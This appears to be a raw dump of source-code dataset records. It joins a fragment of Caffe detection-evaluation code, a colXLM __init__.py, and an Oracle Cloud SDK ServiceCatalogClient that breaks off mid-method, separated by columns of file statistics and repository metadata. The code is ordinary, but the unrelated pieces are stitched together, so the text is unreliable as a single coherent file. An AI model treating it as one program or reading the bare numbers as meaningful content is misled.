'evaluate_difficult_gt':eval_Param.get("eval_difficult_gt",False),
'boxsize_threshold':eval_Param.get("eval_boxsize_threshold",[0,0.01,0.05,0.1,0.15,0.2,0.25]),
'iou_threshold':eval_Param.get("eval_iou_threshold",[0.9,0.75,0.5]),
'background_label_id':0,
}
net.det_accu = L.DetEval(net['detection_out_2'], net[gt_label], \
detection_evaluate_param=det_eval_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
return net
| 60.90966
| 151
| 0.606341
| 8,702
| 68,097
| 4.325557
| 0.034245
| 0.090115
| 0.058341
| 0.077788
| 0.946654
| 0.93786
| 0.934593
| 0.933052
| 0.929651
| 0.929651
| 0
| 0.032313
| 0.270144
| 68,097
| 1,117
| 152
| 60.96419
| 0.725036
| 0.01887
| 0
| 0.87109
| 0
| 0
| 0.236551
| 0.090688
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.018009
| null | null | 0.001896
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3d67b97c686dad31eb36f8510c9145ccf54a95f1
| 232
|
py
|
Python
|
colXLM/modeling/tokenization/__init__.py
|
hannawong/ColXLM
|
56cb7fdd11244b8355d2181c668ee13edfcff457
|
[
"MIT"
] | 115
|
2021-11-10T00:14:29.000Z
|
2022-03-15T02:57:16.000Z
|
colXLM/modeling/tokenization/__init__.py
|
hannawong/ColXLM
|
56cb7fdd11244b8355d2181c668ee13edfcff457
|
[
"MIT"
] | null | null | null |
colXLM/modeling/tokenization/__init__.py
|
hannawong/ColXLM
|
56cb7fdd11244b8355d2181c668ee13edfcff457
|
[
"MIT"
] | 16
|
2021-11-12T02:46:11.000Z
|
2021-12-04T15:53:27.000Z
|
from colXLM.modeling.tokenization.query_tokenization import *
from colXLM.modeling.tokenization.doc_tokenization import *
from colXLM.modeling.tokenization.utils import tensorize_triples,tensorize_triples_qlm,tensorize_triples_prop
| 58
| 109
| 0.892241
| 28
| 232
| 7.142857
| 0.428571
| 0.15
| 0.27
| 0.45
| 0.48
| 0.48
| 0
| 0
| 0
| 0
| 0
| 0
| 0.051724
| 232
| 3
| 110
| 77.333333
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3d9a5d7ae8f3136399072dd719883286319d747b
| 132,132
|
py
|
Python
|
src/oci/service_catalog/service_catalog_client.py
|
ezequielramos/oci-python-sdk
|
cc4235cf217beaf9feed75760e9ce82610222762
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 3
|
2020-09-10T22:09:45.000Z
|
2021-12-24T17:00:07.000Z
|
src/oci/service_catalog/service_catalog_client.py
|
ezequielramos/oci-python-sdk
|
cc4235cf217beaf9feed75760e9ce82610222762
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/service_catalog/service_catalog_client.py
|
ezequielramos/oci-python-sdk
|
cc4235cf217beaf9feed75760e9ce82610222762
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from __future__ import absolute_import
from oci._vendor import requests # noqa: F401
from oci._vendor import six
from oci import retry, circuit_breaker # noqa: F401
from oci.base_client import BaseClient
from oci.config import get_config_value_or_default, validate_config
from oci.signer import Signer
from oci.util import Sentinel, get_signer_from_authentication_type, AUTHENTICATION_TYPE_FIELD_NAME
from .models import service_catalog_type_mapping
missing = Sentinel("Missing")
class ServiceCatalogClient(object):
"""
Manage solutions in Oracle Cloud Infrastructure Service Catalog.
"""
def __init__(self, config, **kwargs):
"""
Creates a new service client
:param dict config:
Configuration keys and values as per `SDK and Tool Configuration <https://docs.cloud.oracle.com/Content/API/Concepts/sdkconfig.htm>`__.
The :py:meth:`~oci.config.from_file` method can be used to load configuration from a file. Alternatively, a ``dict`` can be passed. You can validate_config
the dict using :py:meth:`~oci.config.validate_config`
:param str service_endpoint: (optional)
The endpoint of the service to call using this client. For example ``https://iaas.us-ashburn-1.oraclecloud.com``. If this keyword argument is
not provided then it will be derived using the region in the config parameter. You should only provide this keyword argument if you have an explicit
need to specify a service endpoint.
:param timeout: (optional)
The connection and read timeouts for the client. The default values are connection timeout 10 seconds and read timeout 60 seconds. This keyword argument can be provided
as a single float, in which case the value provided is used for both the read and connection timeouts, or as a tuple of two floats. If
a tuple is provided then the first value is used as the connection timeout and the second value as the read timeout.
:type timeout: float or tuple(float, float)
:param signer: (optional)
The signer to use when signing requests made by the service client. The default is to use a :py:class:`~oci.signer.Signer` based on the values
provided in the config parameter.
One use case for this parameter is for `Instance Principals authentication <https://docs.cloud.oracle.com/Content/Identity/Tasks/callingservicesfrominstances.htm>`__
by passing an instance of :py:class:`~oci.auth.signers.InstancePrincipalsSecurityTokenSigner` as the value for this keyword argument
:type signer: :py:class:`~oci.signer.AbstractBaseSigner`
:param obj retry_strategy: (optional)
A retry strategy to apply to all calls made by this service client (i.e. at the client level). There is no retry strategy applied by default.
Retry strategies can also be applied at the operation level by passing a ``retry_strategy`` keyword argument as part of calling the operation.
Any value provided at the operation level will override whatever is specified at the client level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
:param obj circuit_breaker_strategy: (optional)
A circuit breaker strategy to apply to all calls made by this service client (i.e. at the client level).
This client uses :py:data:`~oci.circuit_breaker.DEFAULT_CIRCUIT_BREAKER_STRATEGY` as default if no circuit breaker strategy is provided.
The specifics of circuit breaker strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/circuit_breakers.html>`__.
:param function circuit_breaker_callback: (optional)
Callback function to receive any exceptions triggerred by the circuit breaker.
"""
validate_config(config, signer=kwargs.get('signer'))
if 'signer' in kwargs:
signer = kwargs['signer']
elif AUTHENTICATION_TYPE_FIELD_NAME in config:
signer = get_signer_from_authentication_type(config)
else:
signer = Signer(
tenancy=config["tenancy"],
user=config["user"],
fingerprint=config["fingerprint"],
private_key_file_location=config.get("key_file"),
pass_phrase=get_config_value_or_default(config, "pass_phrase"),
private_key_content=config.get("key_content")
)
base_client_init_kwargs = {
'regional_client': True,
'service_endpoint': kwargs.get('service_endpoint'),
'base_path': '/20210527',
'service_endpoint_template': 'https://service-catalog.{region}.oci.{secondLevelDomain}',
'skip_deserialization': kwargs.get('skip_deserialization', False),
'circuit_breaker_strategy': kwargs.get('circuit_breaker_strategy', circuit_breaker.GLOBAL_CIRCUIT_BREAKER_STRATEGY)
}
if 'timeout' in kwargs:
base_client_init_kwargs['timeout'] = kwargs.get('timeout')
if base_client_init_kwargs.get('circuit_breaker_strategy') is None:
base_client_init_kwargs['circuit_breaker_strategy'] = circuit_breaker.DEFAULT_CIRCUIT_BREAKER_STRATEGY
self.base_client = BaseClient("service_catalog", config, signer, service_catalog_type_mapping, **base_client_init_kwargs)
self.retry_strategy = kwargs.get('retry_strategy')
self.circuit_breaker_callback = kwargs.get('circuit_breaker_callback')
def bulk_replace_service_catalog_associations(self, service_catalog_id, bulk_replace_service_catalog_associations_details, **kwargs):
"""
Replace all associations of a given service catalog in one bulk transaction.
:param str service_catalog_id: (required)
The unique identifier for the service catalog.
:param oci.service_catalog.models.BulkReplaceServiceCatalogAssociationsDetails bulk_replace_service_catalog_associations_details: (required)
Details of the service catalog update operation.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to
the value of the etag from a previous GET or POST response for that resource. The resource will be updated or
deleted only if the etag you provide matches the resource's current etag value.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/bulk_replace_service_catalog_associations.py.html>`__ to see an example of how to use bulk_replace_service_catalog_associations API.
"""
resource_path = "/serviceCatalogs/{serviceCatalogId}/actions/bulkReplaceAssociations"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"bulk_replace_service_catalog_associations got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"serviceCatalogId": service_catalog_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=bulk_replace_service_catalog_associations_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=bulk_replace_service_catalog_associations_details)
def change_private_application_compartment(self, private_application_id, change_private_application_compartment_details, **kwargs):
"""
Moves the specified private application from one compartment to another.
:param str private_application_id: (required)
The unique identifier for the private application.
:param oci.service_catalog.models.ChangePrivateApplicationCompartmentDetails change_private_application_compartment_details: (required)
The details of the request to change the compartment of a given private application.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to
the value of the etag from a previous GET or POST response for that resource. The resource will be updated or
deleted only if the etag you provide matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/change_private_application_compartment.py.html>`__ to see an example of how to use change_private_application_compartment API.
"""
resource_path = "/privateApplications/{privateApplicationId}/actions/changeCompartment"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_private_application_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"privateApplicationId": private_application_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_private_application_compartment_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_private_application_compartment_details)
def change_service_catalog_compartment(self, service_catalog_id, change_service_catalog_compartment_details, **kwargs):
"""
Moves the specified service catalog from one compartment to another.
:param str service_catalog_id: (required)
The unique identifier for the service catalog.
:param oci.service_catalog.models.ChangeServiceCatalogCompartmentDetails change_service_catalog_compartment_details: (required)
The details of the request to change the compartment of a given service catalog.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to
the value of the etag from a previous GET or POST response for that resource. The resource will be updated or
deleted only if the etag you provide matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/change_service_catalog_compartment.py.html>`__ to see an example of how to use change_service_catalog_compartment API.
"""
resource_path = "/serviceCatalogs/{serviceCatalogId}/actions/changeCompartment"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_service_catalog_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"serviceCatalogId": service_catalog_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_service_catalog_compartment_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_service_catalog_compartment_details)
def create_private_application(self, create_private_application_details, **kwargs):
"""
Creates a private application along with a single package to be hosted.
:param oci.service_catalog.models.CreatePrivateApplicationDetails create_private_application_details: (required)
Private application creation details.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without
risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before
then due to conflicting operations (for example, if a resource has been deleted and purged from the system,
then a retry of the original creation request might be rejected).
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.PrivateApplication`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/create_private_application.py.html>`__ to see an example of how to use create_private_application API.
"""
resource_path = "/privateApplications"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_private_application got unknown kwargs: {!r}".format(extra_kwargs))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_private_application_details,
response_type="PrivateApplication")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_private_application_details,
response_type="PrivateApplication")
def create_service_catalog(self, create_service_catalog_details, **kwargs):
"""
Creates a brand new service catalog in a given compartment.
:param oci.service_catalog.models.CreateServiceCatalogDetails create_service_catalog_details: (required)
The details for creating a service catalog.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without
risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before
then due to conflicting operations (for example, if a resource has been deleted and purged from the system,
then a retry of the original creation request might be rejected).
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.ServiceCatalog`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/create_service_catalog.py.html>`__ to see an example of how to use create_service_catalog API.
"""
resource_path = "/serviceCatalogs"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_service_catalog got unknown kwargs: {!r}".format(extra_kwargs))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_service_catalog_details,
response_type="ServiceCatalog")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_service_catalog_details,
response_type="ServiceCatalog")
def create_service_catalog_association(self, create_service_catalog_association_details, **kwargs):
"""
Creates an association between service catalog and a resource.
:param oci.service_catalog.models.CreateServiceCatalogAssociationDetails create_service_catalog_association_details: (required)
The details for creating the association between resource and service catalog.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without
risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before
then due to conflicting operations (for example, if a resource has been deleted and purged from the system,
then a retry of the original creation request might be rejected).
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.ServiceCatalogAssociation`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/create_service_catalog_association.py.html>`__ to see an example of how to use create_service_catalog_association API.
"""
resource_path = "/serviceCatalogAssociations"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_service_catalog_association got unknown kwargs: {!r}".format(extra_kwargs))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_service_catalog_association_details,
response_type="ServiceCatalogAssociation")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_service_catalog_association_details,
response_type="ServiceCatalogAssociation")
def delete_private_application(self, private_application_id, **kwargs):
"""
Deletes an existing private application.
:param str private_application_id: (required)
The unique identifier for the private application.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to
the value of the etag from a previous GET or POST response for that resource. The resource will be updated or
deleted only if the etag you provide matches the resource's current etag value.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/delete_private_application.py.html>`__ to see an example of how to use delete_private_application API.
"""
resource_path = "/privateApplications/{privateApplicationId}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_private_application got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"privateApplicationId": private_application_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_service_catalog(self, service_catalog_id, **kwargs):
"""
Deletes the specified service catalog from the compartment.
:param str service_catalog_id: (required)
The unique identifier for the service catalog.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to
the value of the etag from a previous GET or POST response for that resource. The resource will be updated or
deleted only if the etag you provide matches the resource's current etag value.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/servicecatalog/delete_service_catalog.py.html>`__ to see an example of how to use delete_service_catalog API.
"""
resource_path = "/serviceCatalogs/{serviceCatalogId}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_service_catalog got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"serviceCatalogId": service_catalog_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
